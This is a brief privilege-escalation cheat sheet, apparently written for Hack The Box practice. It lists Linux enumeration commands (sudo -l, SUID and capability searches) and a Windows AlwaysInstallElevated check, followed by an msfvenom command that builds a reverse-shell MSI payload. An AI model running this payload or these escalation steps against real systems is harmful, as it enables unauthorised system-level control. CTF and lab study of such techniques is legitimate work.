These are all the ways I've encountered to do/find a privilege escalation. This is not an exhaustive list, but I've found they are quite common, at least among HTB boxes.
id Better than "whoami" because it might show interesting groups.
sudo -l Lists all files the current user has permission to execute as root.
find / -perm 4000 2>/dev/null Lists all files that have SUID bit set.
getcap -r / 2>/dev/null Lists all files with capabilities.
netstat -tulpan | grep LISTEN Show all open listening ports. Useful for finding services to exploit.
Windows:
reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer If both are set to 1, the system installs MSI packages as nt authority/system. Generate a reverse shell using something like msfvenom to generate a payload: msfvenom -p windows/x64/shell/reverse_tcp -f msi LHOST=<your ip> LPORT=<your port> > hack.msi.
If on an older system (or try your luck on newer systems), check for kernel exploits with Sherlock [1]. Watson supersedes Sherlock, but is a pain to compile (on linux) due to the requirement of Visual Studio.
If you can determine if the system is vulnerable to a kernel exploit, it will almost definitely be in SecWiki [2].